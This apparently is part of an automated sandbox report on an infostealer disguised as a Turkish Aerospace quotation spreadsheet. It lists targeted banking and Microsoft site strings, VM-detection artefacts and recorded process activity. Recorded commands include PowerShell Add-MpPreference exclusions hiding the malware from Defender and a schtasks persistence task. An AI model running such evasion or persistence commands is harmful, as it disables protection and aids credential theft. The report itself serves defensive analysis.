                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: WheTgQY.exe, 00000009.00000002.2081548688.0000000007D63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5#
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4485070133.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2043053754.0000000007329000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: WheTgQY.exe, 00000010.00000002.4485590144.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: WheTgQY.exe, 00000009.00000002.2081548688.0000000007D63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D9548 LdrInitializeThunk,LdrInitializeThunk,10_2_055D9548
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeMemory written: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeMemory written: C:\Users\user\AppData\Roaming\WheTgQY.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeProcess created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
